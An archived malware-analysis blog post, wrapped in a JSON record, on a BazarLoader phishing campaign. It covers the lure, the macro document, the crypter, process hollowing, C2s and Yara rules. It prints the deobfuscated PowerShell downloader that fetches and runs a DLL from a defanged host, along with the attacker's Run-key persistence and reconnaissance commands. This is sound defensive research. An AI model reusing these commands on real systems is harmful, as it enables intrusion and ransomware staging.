{
	"id": "1d2f46c5-bba3-4b85-9a0f-f1bdd4d6bc3a",
	"created_at": "2026-04-06T00:22:03.46156Z",
	"updated_at": "2026-04-10T03:22:13.88292Z",
	"deleted_at": null,
	"sha1_hash": "217f4616d960481d37a3497d97c4bda5a5bff598",
	"title": "BazarLoader – Back From Holiday Break – Malware Book Reports",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 184581,
	"plain_text": "BazarLoader – Back From Holiday Break – Malware Book Reports\r\nBy muzi View all posts\r\nArchived: 2026-04-05 19:18:02 UTC\r\nWe recently observed a Bazarloader campaign at $dayjob, kicking off the return of maldoc campaigns after the holidays.\r\nThis campaign piqued my interest after it hit on my SPLCrypt Yara rule that I wrote a while back, so I figured why not do a\r\nquick write-up and share that rule out. If there are any errors in this post, please feel free to reach out to me for corrections.\r\nI’m still learning!\r\nUpdate: I’d been meaning to come back and do a more thorough analysis of BazarLoader and finally got around to it.\r\nDuring that time, Eli Salem, a researcher that I follow and learn from, released a write up on BazarLoader. Though our\r\narticles share a lot of overlapping information (both articles are on samples from the same campaign), Eli goes into more\r\ndetail than I do in several areas and I highly recommend reading Eli’s article.\r\nEmail with Link to Maldoc\r\nThe emails in this campaign were themed around participating in an interview and being awarded with a cash incentive for\r\ndoing so. The emails requested that the user download a document with a password of 123 and answering the questions\r\ninside to participate. Below is a sample of the lure.\r\nHi \u003cRedacted\u003e,\r\nOur client is looking to speak with professionals in the manufacturing and food production industries who have management\r\nThey are aiming to better understand the needs of people who are responsible for managing the day to day ongoing complianc\r\nI found you on LinkedIn and I think you're a good fit for this study.\r\nAn incentive of $250 will be paid to each participant for a 15-minute web interview. A bonus of $150 is also available for\r\nKindly answer the questions attached by link below (pass 123) if you want to participate and as to your relevance in this\r\nhxxps://1drv[.]ms/u/s!AqBUxnmcQ_BtblNHfJc4D_sZAh4?e=o4ejxJ\r\nMaldoc with Macros\r\nFilename: ReadMe.doc\r\nMD5: dbd0bb79ea2465a02455edca624f9bc8\r\nSHA1: 96c58f2c78ae38302f8f20e9cb08837ea3149eeb\r\nSHA256: 2e367fcfc6583efad45bb8bbc97a77f30853d11322335d14d3d3d9ff4a79ea3c\r\nThe Word document has a simple lure requesting that the user click both “Enable Editing” and “Enable Content.” Once\r\nenabled, the malicious macro included in the document will kick off.\r\nFigure 1: Malicious Macro Runs on AutoOpen\r\nThe macros embedded in the document are made to look like code to process credit cards. Buried in the VBA, a folder is\r\ncreated and two files are created and written to using #Print.\r\nFigure 2: Folder Creation\r\nFigure 3: 2 Files Created and Written To (1.png, 2.png)\r\nThe two “png” files that are written are actually 32/64 bit DLL files that are then executed by the macro. The functionality\r\nof the two DLLs is identical: run a PowerShell script to download the next stage.\r\nDLL/Powershell Downloader\r\nFilename: 1.png\r\nMD5: 6dab9678f4ae6395b829ff53dace8432\r\nhttps://malwarebookreports.com/bazarloader-back-from-holiday-break/\r\nPage 1 of 13\n\nSHA1: fe7ee5ce4435fcc271ab976146e2e6d8f16fde78\r\nSHA256: 7076e5832b8c2a386e70de2612280f96b09062ec5402e18aee65fb46de9d50b4\r\nFilename: 2.png\r\nMD5: f31e276e3a50fdd8b800f649dcff19cf\r\nSHA1: f55b2b821d12eed29b02d73e519dfa6d12eee1a5\r\nSHA256: 9304089e076099451e8a7b8fe204986d6e762d939512f20877fc06ba69b4d42e\r\nThe DLLs written by the maldoc are simple downloaders that write a PowerShell script named errcheck.ps1 and execute it.\r\nThe DLLs are not packed and simply running strings reveals the majority of the functionality of the downloaders.\r\nFigure 4: Name of .ps1 Written and Executed\r\nFigure 5: Command Executed to Run PS1\r\nAfter running strings, a blob of base64 data can be found in the output. Once decoded, the contents of the malicious ps1 file\r\nare revealed.\r\nFilename: errcheck.ps1\r\nMD5: c352d68a4d6077a3a94c57aed16c139b\r\nSHA1: 107ba4ca7a9b1c102295e951a40bddfac0c5d28e\r\nSHA256: 9ca8609a1f3c9eeaa81205d7cad0a4747ffc358c07924ece6ed55ce21df2de33\r\nThe PowerShell downloader is fairly simple but contains a fair amount of junk code to distract analysts and make it slightly\r\nannoying to read. Below is a small snippet showing an example of the junk code.\r\nFigure 6: Start-Process Call Hidden Amongst Junk Code\r\nOnce the junk code is removed, it is quite clear what this code is trying to accomplish. It simply downloads the next stage\r\nDLL via BitsTransfer and executes it using Start-Process and rundll32.exe.\r\nStart-Sleep -s 5\r\n$source = \"hxxp://nasikbazar[.]com/ldllrndlleaw64[.]png\"\r\nStart-Sleep -s 1\r\n$source2 = \"hxxp://nasikbazar[.]com/ldllrndlleaw64[.]png\"\r\n$mpath = \"c:\\.intel\\.rem\\.lang\\licne.txt\"\r\nif (Test-Path -Path $mpath){\r\nStart-Sleep -s 6\r\n}else{\r\nImport-Module bitstransfer;Start-BitsTransfer $source $mpath\r\n}\r\nif (Test-Path -Path $mpath){\r\nStart-Sleep -s 2\r\n}else{\r\nImport-Module bitstransfer;Start-BitsTransfer $source2 $mpath\r\n}\r\nStart-Sleep -s 6\r\nStart-Process -FilePath \"c:\\windows\\system32\\rundll32.exe\" -ArgumentList \"c:\\.intel\\.rem\\.lang\\licne.txt, Ep\r\nBazarLoader is a small loader that is part of the Team9 malware family, developed by the same group behind Trickbot. The\r\nTeam9 malware family was identified publicly in late April 2020 and has seen significant advances in development ever\r\nsince.\r\nSPLCrypt\r\nThe Team9 developers have a few crypters of choice and often rotate which crypter is used to pack their malware for each\r\ncampaign. In this case, our BazarLoader sample was packed with SPLCrypt, a new crypter associated with BazarLoader.\r\nThere’s very little information surrounding this particular crypter online, outside of a Yara rule that James Quinn of Binary\r\nDefense wrote. This rule is not public, so I have created my own Yara rule for this crypter which may be found at the end of\r\nthis blog post.\r\nFilename: licne.txt\r\nMD5: 3e57f39950ee4368e0a15abea1133272\r\nhttps://malwarebookreports.com/bazarloader-back-from-holiday-break/\r\nPage 2 of 13\n\nSHA1: 7303d9dd5795a667a1aecf94dc252c8105aca95d\r\nSHA256: 62a7b273f763f92fd683d9248ae9ab7f5bc115b8c15e995291fdeb91d1aecc4b\r\nSPLCrypt consists of three key sections: RC4 Decryption, Decompression and Execution of the Payload. If following along,\r\ndo not forget to set the new origin to the export “EproyAklw.”\r\nFigure 7: Set New Origin to EproyAklw\r\nRC4 Decryption\r\nSPLCrypt first RC4 decrypts the BazarLoader payload, which is stored in two separate sections, combined and decrypted.\r\nFigure 8: RC4 Decrypt Function Call\r\nFigure 9: RC4 KSA (Key Scheduling Algorithm)\r\nOnce the RC4 decryption of the ciphertext has finished, the decrypted data resembles a compressed MZ/PE header.\r\nFigure 10: Compressed MZ/PE Header\r\nDecompression\r\nAfter the ciphertext has been RC4 decrypted, the decrypted data is then passed to a function to perform decompression.\r\nFigure 11: Decompression Function Call\r\nOnce the decompression routine has completed, we’re left with the unpacked BazarLoader DLL.\r\nFigure 12: Unpacked BazarLoader DLL (Preceded by |SPL|, hence the name SPLCrypt)\r\nExecution of Payload\r\nNow that the payload has been decrypted and decompressed, SPLCrypt borrows some code from Metasploit. This shellcode\r\ndynamically resolves the addresses of a few functions, to be used to create a section of memory and reflectively load and\r\nexecute the unpacked payload.\r\nFigure 13: Shellcode Resolving Functions Related to Execution of the Unpacked Malware\r\nOnce the addresses of the necessary functions have been resolved, NtCreateSection is called to create a section of memory is\r\ncreated in preparation to reflectively load and execute the payload.\r\nFigure 14: NtCreateSection SECTION_ALL_ACCESS\r\nNext, the unpacked payload is copied into allocated memory and finally executed.\r\nFigure 15: Unpacked Payload Copied into Allocated Memory\r\nFigure 16: VirtualProtect Setting Newly Allocated Memory to RWX (40)\r\nFinally, execution is transferred to the unpacked BazarLoader.\r\nFigure 17: Transfer Execution to Unpacked BazarLoader\r\nBazarLoader\r\nBazarLoader acts as an entry/staging point into a target network. BazarLoader is usually quickly followed up by\r\nBazarBackdoor, Cobalt Strike and then Ryuk Ransomware. The graphic below from Bleeping Computer shows this cycle.\r\nhttps://malwarebookreports.com/bazarloader-back-from-holiday-break/\r\nPage 3 of 13\n\nFigure 18: Typical Bazar Infection\r\nBAZARLOADER EXECUTION\r\nBazarLoader uses dynamic API hashing to resolve APIs used within the malware. This technique makes static analysis\r\nslightly more difficult in that it dynamically resolves Windows API calls rather than statically linking them. BazarLoader\r\nmakes use of the same hashing routine as Carberp. Typically, shortly after resolving a pointer to the desired API,\r\nBazarLoader calls the function.\r\nFigure 19: BazarLoader use same dynamic API hashing routine as seen in Carberp\r\nWhen Bazarloader is executed, it runs several commands similar to:\r\ncmd /c choice /n /c y /d y /t 9 \u0026 \"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Users\\Admin\\AppData\\Local\\Temp\\dumped_bazar.bin\r\nFigure 20: Terminate Current Process and Start BazarLoader Again\r\nThis command deletes the currently running process and starts BazarLoader again, this time with different arguments. Next,\r\nBazarLoader adds persistence in the form of a Run Key.\r\ncmd.exe /c reg.exe add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /f /v Fv1ti2wN5mS4nG4tQ3U /t REG_SZ /d \"\\\"C:\\W\r\nFigure 21: BazarLoader Persistence via RunKey\r\nFigure 22: BazarLoader Persistence\r\nOnce persistence has been established, BazarLoader searches for an injection target. BazarLoader targets svchost.exe,\r\ncmd.exe and explorer.exe, as well as IEXPLORE, MSEdge and Chrome.\r\nFigure 23: Querying for Installed Apps\r\nFigure 24: Chrome Identified\r\nFigure 25: Chrome.exe Injection Target\r\nOnce a target has been identified, BazarLoader will execute this process in a suspended state, hollow it out and inject itself\r\ninto it.\r\nFigure 26: CreateProcess in Suspended State\r\nFigure 27: Chrome Started in Suspended State\r\nFigure 28: Inject Malicious Code into Chrome\r\nFinally, once injected, execution is transferred with ResumeThread.\r\nhttps://malwarebookreports.com/bazarloader-back-from-holiday-break/\r\nPage 4 of 13\n\nFigure 29: Resume Thread to Transfer Execution to Malicious Code Injected into Chrome\r\nAfter injecting itself into a hollowed-out process, BazarLoader sleeps for a short period. Next, it begins performing some\r\nconnectivity checks to the following:\r\nyahoo.com\r\ngoogle.com\r\namazon.com\r\nmicrosoft.com\r\nmsdn.microsoft.com\r\nlive.com\r\neset.com\r\nfortinet.com\r\nsky.com\r\nintel.com\r\nhp.com\r\nhpe.com\r\napple.com\r\nvanguard.com\r\nwhitehouse.gov\r\nFigure 30: Example of Domain Used for Connectivity Checks\r\nThe domains above, the C2s below and many additional strings are decrypted by BazarLoader during runtime using routines\r\nsimilar to the following. Note: Similar routines are used to decrypt strings throughout BazarLoader, making it a prime target\r\nfor a Yara rule.\r\nFigure 31: String Decryption Routine\r\nOnce connectivity has been verified, BazarLoader will attempt resolve the following hardcoded C2s.\r\n185[.]99[.]133[.]67\r\n188[.]127[.]249[.]22\r\n5[.]255[.]103[.]36\r\n91[.]201[.]202[.]138\r\nreddew28c[.]bazar\r\nbluehail[.]bazar\r\nwhitestorm9p[.]bazar\r\nFigure 32: Bazar Domains in BazarLoader Sample\r\nIf unsuccessful, BazarLoader will resolve DGA Emercoin domains.\r\nFigure 33: Bazar DGA Algorithm\r\nBazarLoader Available COmmands\r\nBazarLoader serves as an entrypoint into a network. It supports several options to help profile the infected host, fetch and\r\nexecute commands, return command output to server and finally download and execute BazarBackdoor.\r\nFigure 34: BazarLoader Command Options (Except Download and Run Backdoor)\r\nSend Telemetry\r\nThis command sends basic information about the infected host machine to the server.\r\nFigure 35: Send Telemetry Command\r\nhttps://malwarebookreports.com/bazarloader-back-from-holiday-break/\r\nPage 5 of 13\n\nGet Command From Server\r\nGet Command From Server does exactly what it says it does – it fetches commands from the C2 server and executes them.\r\nHere are some examples of commands sent from the C2 server:\r\nnet group “domain admins” /dom\r\nnet localgroup “administrator”\r\nnltest /domain_trusts /all_trusts\r\nnet group “Domain Computers” /domain\r\nnet view /all\r\npowershell -executionpolicy bypass -command “try { Get-WmiObject -Namespace ‘root\\SecurityCenter2’ -Query\r\n‘SELECT displayName, pathToSignedProductExe FROM AntiVirusProduct’ -ErrorAction Stop } catch { Write-Host\r\n” -NoNewline }”\r\npowershell -executionpolicy bypass -command “$path=’windowsdefender://’; if ($path -eq $null) { Write-Host ‘0’ }\r\nelse { if (Test-Path ($path)) { write-host\r\n([System.Diagnostics.FileVersionInfo]::GetVersionInfo($path).ProductVersion) } else { Write-Host ‘0’ } }”\r\npowershell -executionpolicy bypass -command\r\n“$Servers=@(‘http://checkip.amazonaws.com’,’https://ipinfo.io/ip’,’http://api.ipify.org’,’https://myexternalip.com/raw’,’http://wtfismyip.com/text\r\nformat=text’,’http://api.ip.sb/ip’,’http://ident.me/ip’);$i=Get-Random -Minimum 0 -Maximum 8; \u003c#Write-Host\r\nHTTP-DNS request via $Servers[$i];#\u003etry { $ip=Invoke-WebRequest -UseBasicParsing -Uri $Servers[$i]; Write-Host $ip.content -NoNewline; }catch { \u003c#Write-Error $_.Exception.Message;#\u003e Write-Host ” -NoNewline; }”\r\npowershell -command “foreach ($p in (Get-WmiObject -Class Win32_Processor)) {Write-Host $p.Name}”\r\npowershell -command “foreach ($p in (Get-WmiObject -Class Win32_DiskDrive)) {Write-Host ([string]int+’GB,\r\n‘+$p.Caption);}”\r\npowershell -command “(Get-WmiObject -Class ‘Win32_BaseBoard’).Manufacturer”\r\npowershell -command “((Get-WmiObject -Class\r\nWin32_ComputerSystem).TotalPhysicalMemory/1mb).tostring(‘F00’)”\r\nFigure 36: Get Command From Server Command\r\nSend Answer to Server\r\nThe Send Answer from Server command simply sends the output of the command executed from “Get Command From\r\nServer.”\r\nDownload and Run Backdoor\r\nThis command attempts to download and run the BazarBackdoor for additional post-exploitation activity. Based on previous\r\nConti activity, this typically leads to Cobalt Strike and eventually ransomware.\r\nFigure 37: BazarLoader Command to Download and Run BazarBackdoor\r\nSPLCrypt Yara Rule\r\nAs always, please test this rule in your environment before using. I’m not responsible for causing tons of alerts or breaking\r\nyour tools/environment, due to inefficiency (which this rule is), False Positives, etc.! Again, special thanks to James Quinn\r\nof Binary Defense for providing the rule to abuse.ch and encouraged me to write this rule. Additional Yara rules I’ve written\r\nand included in my other blog posts can be found here.\r\nrule SPLCrypt {\r\n meta:\r\n author = \"muzi\"\r\n description = \"Identifies SPLCrypt, a crypter associated with Bazar.\"\r\n date = \"01/16/22\"\r\n strings:\r\n // Implementation of ROR(x, 0x0D)\r\n // (x \u003c\u003c 0x13|x \u003e\u003e 0x0D) == ROR(x,0x0D)\r\n /*\r\n 00007FFADADC4E37 | 8B0424 | mov eax,dword ptr ss:[rsp] | hash\r\n00007FFADADC4E3A | C1E8 0D | shr eax,D |\r\n00007FFADADC4E3D | 66:3BFF | cmp di,di |\r\n00007FFADADC4E40 | 74 4C | je splcrypt_bazar.7FFADADC4E8E |\r\n*/\r\nhttps://malwarebookreports.com/bazarloader-back-from-holiday-break/\r\nPage 6 of 13\n\n$match_1_shr = {\r\n (8B|8D) ?? 24 [0-8] // mov \u003creg\u003e, dword ptr ss:[rsp] hash\r\n C1 (E8|E9|EA|EB|ED|EE|EF) 0D [0-16] // shr \u003creg\u003e, D\r\n (E2|EB|72|74|75|7C) ?? // Conditional JMP\r\n }\r\n /*\r\n 00007FFADADC4E85 | 48:634424 04 | movsxd rax,dword ptr ss:[rsp+4] | i\r\n00007FFADADC4E8A | 3AFF | cmp bh,bh |\r\n00007FFADADC4E8C | 74 DE | je splcrypt_bazar.7FFADADC4E6C |\r\n00007FFADADC4E8E | 8B0C24 | mov ecx,dword ptr ss:[rsp] |\r\n00007FFADADC4E91 | C1E1 13 | shl ecx,13 |\r\n00007FFADADC4E94 | E9 44FFFFFF | jmp splcrypt_bazar.7FFADADC4DDD\r\n*/\r\n $match_2_shl_13 = {\r\n (8B|8D) ?? 24 [0-8]\r\n C1 (E0|E1|E2|E3|E5|E6|E7) 13\r\n }\r\n condition:\r\n #match_1_shr \u003e 1 and #match_2_shl_13 \u003e 1 and\r\n for any i in (0..#match_1_shr):\r\n ($match_2_shl_13 in (@match_1_shr[i]..@match_1_shr[i]+200))\r\n}\r\nSPLCrypt Unpacker\r\nI wrote a small unpacker utilizing Speakeasy from Mandiant to dump out the decrypted/decompressed BazarLoader sample.\r\nI originally intended to do it without emulation, but was unable to determine which type of compression was being used.\r\nBazarLoader Yara Rule\r\nI haven’t tested this rule in a production environment, so just as I said with the rule above, use at your own risk. It’s also a\r\nbit non-performant.\r\nrule BazarLoader {\r\n meta:\r\n author = \"muzi\"\r\n description = \"Identifies BazarLoader.\"\r\n date = \"02/18/22\"\r\n strings:\r\n /*\r\n 18000de19 c7 45 0b MOV dword ptr [RBP + local_54 ],0x3d9ffcdb\r\n db fc 9f\r\n 3d\r\n 18000de20 c7 45 0f MOV dword ptr [RBP + local_50 ],0x61c9eecc\r\n cc ee c9\r\n 61\r\n 18000de27 c7 45 13 MOV dword ptr [RBP + local_4c ],0x3899b7ca\r\n ca b7 99\r\n 38\r\n 18000de2e c7 45 17 MOV dword ptr [RBP + local_48 ],0x5989f8d3\r\n d3 f8 89\r\n 59\r\n 18000de35 8b 45 0b MOV EAX ,dword ptr [RBP + local_54 ]\r\n 18000de38 8a 45 07 MOV AL ,byte ptr [RBP + local_58 ]\r\n 18000de3b 84 c0 TEST AL ,AL\r\n 18000de3d 75 19 JNZ LAB_18000de58\r\n 18000de3f 48 8b cb MOV param_1 ,RBX\r\n LAB_18000de42 XREF[1]: 18000de56 (j)\r\n 18000de42 8b 44 8d MOV EAX ,dword ptr [RBP + param_1 *0x4 + local_50 ]\r\n 0b\r\n 18000de46 35 a9 99 XOR EAX ,0x59fb99a9\r\n fb 59\r\nhttps://malwarebookreports.com/bazarloader-back-from-holiday-break/\r\nPage 7 of 13\n\n*/\r\n $xor_hash = {\r\n C7 4? [2-4] ?? ?? ?? ??\r\n C7 4? [2-4] ?? ?? ?? ?? [10-30]\r\n 35\r\n }\r\n /*\r\n LAB_180012316 XREF[1]: 1800122ca (j)\r\n 180012316 40 88 7c MOV byte ptr [RSP + local_1d0 ],DIL\r\n 24 78\r\n 18001231b ba e7 5f MOV param_2 ,0x1a705fe7\r\n 70 1a\r\n 180012320 c7 44 24 MOV dword ptr [RSP + local_1cc ],0x72132994\r\n 7c 94 29\r\n 13 72\r\n 180012328 c7 45 80 MOV dword ptr [RBP + local_1c8 ],0x34042c88\r\n 88 2c 04\r\n 34\r\n 18001232f c7 45 84 MOV dword ptr [RBP + local_1c4 ],0x3a152782\r\n 82 27 15\r\n 3a\r\n 180012336 89 55 88 MOV dword ptr [RBP + local_1c0 ],param_2\r\n 180012339 8b 44 24 MOV EAX ,dword ptr [RSP + local_1cc ]\r\n 7c\r\n 18001233d 8a 44 24 MOV AL ,byte ptr [RSP + local_1d0 ]\r\n 78\r\n 180012341 84 c0 TEST AL ,AL\r\n 180012343 75 16 JNZ LAB_18001235b\r\n 180012345 48 8b cf MOV param_1 ,RDI\r\n LAB_180012348 XREF[1]: 180012359 (j)\r\n 180012348 8b 44 8c MOV EAX ,dword ptr [RSP + param_1 *0x4 + local_1c8 ]\r\n 7c\r\n 18001234c 33 c2 XOR EAX ,param_2\r\n */\r\n \r\n $xor_reg = {\r\n BA ?? ?? ?? ??\r\n C7 4? [2-4] ?? ?? ?? ??\r\n C7 4? [2-4] ?? ?? ?? ?? [10-30]\r\n 33 C2\r\n }\r\n condition:\r\n uint16be(0) == 0x4D5A and\r\n #xor_hash \u003e 5 and\r\n #xor_reg \u003e 5\r\n}\r\nBazarLoader String Decryptor\r\nI wanted to write a string decryptor for BazarLoader since doing it manually is a bit of a pain. Originally I was using Yara to\r\nextract the instruction sequences, but using a pure Python implementation was more effective and easier.\r\nGetFullPathNameA\r\nt write data\r\nCryptdll.dll\r\nrundll32.exe\r\nGetFileAttributesExA\r\ncmd.exe /c reg.exe add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /f /v\r\nkernel32.dll\r\nbytearray(b'#`8)\\x7f\\x11.n+\\x12Y\\xbc\\xc4N_\\xb7')\r\nbytearray(b\"\\x9b\\'J\\xc6Q\\xb4f\\x98\\xa6\\xd3\\x10V\\xdd\\xc7\\x1ez\")\r\nbytearray(b'm\\x1d\\xd9R\\x8dU\\xe30G\\t\\x82\\x0cX\\x80/\\x88')\r\nbytearray(b'\\xbdl\\xc5^\\x1b\\xc06\u0026\\x9dC\\xcf\\xb3v[\\xb6-')\r\nbytearray(b'\\xd7\\xe04\u003e}d\\xe1\\x86\\x0f\\xbf\\xa8\\x08\\xdc\\x182P')\r\nhttps://malwarebookreports.com/bazarloader-back-from-holiday-break/\r\nPage 8 of 13\n\nbytearray(b'\\x1c\\xd6\\x8fK \\r\\x85I\\x15cx\\xa3\\xc1\\x19\\xb9\\x16')\r\nbytearray(b'\\xc3B\\xa2W\\x81Fi\\xa1\\x9eT\\x14\\xaf\\xd4\\xcd!t')\r\nbytearray(b'3\\xc2\\x02\\x8a;\u003c\\x937uO\\xa9\\xad\\x05\\xde\\xae\\xe2')\r\nbytearray(b'\\x90k\\xb5\\xbeML\\xdb\\xa5\\xd2\\\\$\\x06?(s\\x1f')\r\nbytearray(b'\\x9a\\x91\\x89p@Zq\\xc9\\xd8a\\x95H\\xaboS\\x84')\r\nbytearray(b'\\x96|1\\x9c\\xc8\\x0b5\\x13A\\x9f\\xb89\\xceE{b')\r\nbytearray(b'\\x1a\\xac\\x8b\\x0e\\x17\\x94\"\\xa7,\\xd0e\\x97')\r\nBCryptFreeBuffer\r\nBCryptAddContextFunction\r\nTLS_ECDHE_ECDSA_\r\nTLS_RSA_WITH_AES_256_CBC_SHA\r\nTLS_RSA_WITH_AES_128_CBC_SHA\r\nadvapi32.dll\r\nl3dGr_uWs_p9m55s\r\n5.255.103.36\r\nregsvr32.exe\r\nsvchost.exe\r\nsvchost.exe\r\nkernel32.dll\r\nfortinet.com\r\nvanguard.com\r\nkernel32.dll\r\nkernel32.dll\r\nBCryptCreateHash\r\nBCryptFinishHash\r\nMIIEnwIBAAKCAQCs/Imfp7Sjqp2YPvDxQ+L5fKPfde3SazTkKYFzaVK72T5QNRitAU8yYoNj0rWkjDDs4cjn8dP8wzA0/CK+AqE09ZcNJXP1z6b+/b0oZhVMIw\r\nC1k2Lgooc0NeLiM7ZFFbj4v2x9SPkZCel0h/DhBJXeX8qJLdPDtdxNCTM6CPaxZwqZS0NI61DS4+9e2rX2Vy\r\n29OqoXtBN9fKFYHw+r4fedEDJxNa42r3E9vZpq457r9jteM=\r\nhardcoded IP\r\nUndefined\r\nBitDefender\r\nNortonSecurity\r\nWindowsDefender\r\n]. Error code = [\r\nCan't create file in path = [\r\n]. Error code = [\r\nMD5Update\r\nCreatePipe\r\nCreatePipe() return error\r\nPeekNamedPipe\r\nSet-Cookie:\r\n/nobreak\r\n/c y /d y /t\r\n127.0.0.1\r\n /t REG_SZ /d\r\nGetDateFormatA\r\nbcdfghklmnpqrstvwxz\r\nWs2_32.dll\r\ninet_pton\r\n95.217.229.211\r\n217.160.188.24\r\n89.163.140.67\r\n185.52.0.55\r\n195.10.195.195\r\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)\r\nContent-Type: application/x-www-form-urlencoded\r\nBcrypt.dll\r\nBCryptEnumContextFunctions\r\nTLS_ECDHE_RSA_WITH_AES_256_CBC_SHA\r\nTLS_ECDHE_RSA_WITH_AES_128_CBC_SHA\r\nTLS_RSA_WITH_AES_256_GCM_SHA384\r\nTLS_RSA_WITH_AES_128_GCM_SHA256\r\nTLS_RSA_WITH_AES_256_CBC_SHA256\r\nTLS_RSA_WITH_AES_128_CBC_SHA256\r\nTLS_RSA_WITH_3DES_EDE_CBC_SHA\r\nuser32.dll\r\nws2_32.dll\r\nntdll.dll\r\nshell32.dll\r\nwininet.dll\r\nurlmon.dll\r\nhttps://malwarebookreports.com/bazarloader-back-from-holiday-break/\r\nPage 9 of 13\n\nshlwapi.dll\r\nversion.dll\r\nole32.dll\r\na0lDGeEdIfO0g\r\nrFg6_9k8y_Sf_Gh6l7d\r\nlDF_2cSr_vT7e6r3s\r\nl1d00rG_sE3tFr1t_aGpJp\r\na09r4i67h\r\na0r3f45u7v\r\nf23k5p0r1m\r\nvSaDlRhBlEdMiRs\r\nrFg_7m3n0_sDv\r\nrDe6_mRa_9dSnFs\r\nrFeSg_4b5zKr_Qs4eDr\r\nrFgQtIr_b8aWz_Ki0\r\n185.99.133.67\r\n188.127.249.22\r\n91.201.202.138\r\nreddew28c.bazar\r\nbluehail.bazar\r\nwhitestorm9p.bazar\r\ncmd.exe /c reg.exe query HKCU\\Software\\\r\ncmd.exe /c reg.exe query HKCU\\Software\\\r\ncmd.exe /c reg.exe query HKCU\\Software\\\r\ncmd.exe /c reg.exe add HKCU\\Software\\\r\ncmd.exe /c reg.exe add HKCU\\Software\\\r\n /t REG_BINARY /d\r\ncmd.exe /c reg.exe add HKCU\\Software\\\r\n /t REG_BINARY /d\r\ncmd.exe /c reg.exe query\r\nchrome.exe\r\nmsedge.exe\r\nInternet Explorer\\\r\ncmd.exe /c reg.exe query\r\n\" /v \"Path\"\r\nInternet Explorer\\\r\nchrome.exe\r\nmsedge.exe\r\n SCODEF:17508 CREDAT:3\r\n --type=renderer --field-trial-handle=1140,\r\nchrome.exe\r\nmsedge.exe\r\n --instant-process --device-scale-factor=1\r\n --no-v8-untrusted-code-mitigations\r\n \u0026 start \"\" \"\r\n \u0026 start \"\" \"\r\nntdll.dll\r\nSetEnvironmentVariableA\r\n/absent0/offensive\r\ndownload and run backdoor\r\nyahoo.com\r\ngoogle.com\r\namazon.com\r\nmicrosoft.com\r\nmsdn.microsoft.com\r\nintel.com\r\napple.com\r\nwhitehouse.gov\r\nInitializeProcThreadAttributeList\r\nUpdateProcThreadAttribute\r\nntdll.dll\r\nNtGetContextThread\r\nNtSetContextThread\r\nNtResumeThread\r\nNtQueryInformationProcess\r\n(bytesMaskedProcess) is EMPTY\r\nDllRegisterServer\r\nGetDateFormatA\r\nGetTimeFormatA\r\nCrypt32.dll\r\nCryptDecodeObjectEx\r\nhttps://malwarebookreports.com/bazarloader-back-from-holiday-break/\r\nPage 10 of 13\n\nCryptDecodeObject\r\nBcrypt.dll\r\nBCryptGetProperty\r\nBCryptDestroyHash\r\nBCryptHashData\r\nBCryptSignHash\r\nBCryptImportKeyPair\r\nBCryptEncrypt\r\nBCryptDecrypt\r\n-----BEGIN RSA PRIVATE KEY-----\r\n-END RSA PRIVATE KEY\r\nRSAFULLPRIVATEBLOB\r\nBlockLength\r\nhardcoded Emercoin\r\ngenerate Emercoin\r\nI wrote an additional string decryptor using Unicorn to see if that route would be more effective. It turns out it’s a little bit\r\nmore difficult. It was still a fun exercise! Example output is below.\r\nundefined\r\nundefined\r\n.)$L?)2 |{v7\\FV\r\nt cr\r\nhrror code = [\r\n\u0026pdate\r\nCreatePipe\r\nPeekNamedPipe\r\n3Cookie:\r\nz6=iie:\r\n/nobreak\r\n\u003e NUL\r\nchoice\r\n/c y /d y /t\r\n\u003e NUL\r\nping\r\n127.0.0.1\r\n /t REG_SZ /d\r\nateFB\r\naeioqk\r\nWs2_32.dll\r\ninet_pton\r\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)\r\nBcrypt.dll\r\nBCryptEnumContextFunctions\r\nTLS_ECDHE_RSA_WITH_AES_256_CBC_SHA\r\nTLS_ECDHE_RSA_WITH_AES_128_CBC_SHA\r\nTLS_RSA_WITH_AES_256_GCM_SHA384\r\nTLS_RSA_WITH_AES_128_GCM_SHA256\r\nTLS_RSA_WITH_AES_256\r\nTLS_RSA_WITH_AES_128_CBC_SHA256\r\nTLS_RSA_WITH_3DES_EDE_CBC_SHA\r\nuser32.d?\r\nws2_32.dll\r\nntdll.dll\r\nshell32.dll\r\nwininet.dll\r\nurlmon.dll\r\nshlwapi.dll\r\nversion.dll\r\nole32.dll\r\na0lDGeEdIfO0g\r\nrFg6_9k8y_Sf_Gh6l7d\r\nlDF_2cSr_vT7e6r3s\r\nl1d00rG_sE3tFr1t_aGpJp\r\na09r4i67h\r\na0r3l\r\nf23k5p0r1m\r\nvSaDlRhBlEdMiRs\r\nrFg_7m3n0_sDv\r\nrDe6_mRa_9dSnFs\r\nhttps://malwarebookreports.com/bazarloader-back-from-holiday-break/\r\nPage 11 of 13\n\nrFeSg_4b5zKr_Qs4eDr\r\nrFgQtIr_b8aWz_Ki0\r\n185.99.133.67\r\n188.127.249.22\r\n91.201.202.138\r\nreddew28c.bazar\r\nbluehail.bazar\r\nwhitestorm9p.bazar\r\nDexe /c reg.exe query HKCU\\Software\\\r\n3Ceexe /c reg.exe query HKCU\\Software\\\r\ncmd.exe /c reg.exe query HKCU\\Software\\\r\n /v \"\r\ncmd.exe /c reg.exe add HKCU\\Software\\\r\n /f /v\r\ncmd.exe /c reg.exe add HKCU\\Software\\\r\n /t REG_BINARY /d\r\n /f /v\r\ncmd.exe /c reg.exe add HKCU\\Software\\\r\n /t REG_BINARY /d\r\nexe\r\nzme.e\r\nrbexe\r\n \"Pa\r\nchrome.exe\r\nmsedge.exe\r\n SCODEF:17508 CREDAT:3\r\n --type=renderer --field-trial-handle=1140,\r\nchrome.exe\r\nPe-scale-factor=1 --num-raster-threads=2\r\nmsedge.exe\r\n --instant-process --device-scale-factor=1\r\n --no-v8-untrusted-code-mitigations\r\n \u0026 start \"\" \"\r\nntdl\r\nnvironme\r\n7_;B}P-7Q?W}P*Xn[Y1\r\n$IR{load and run 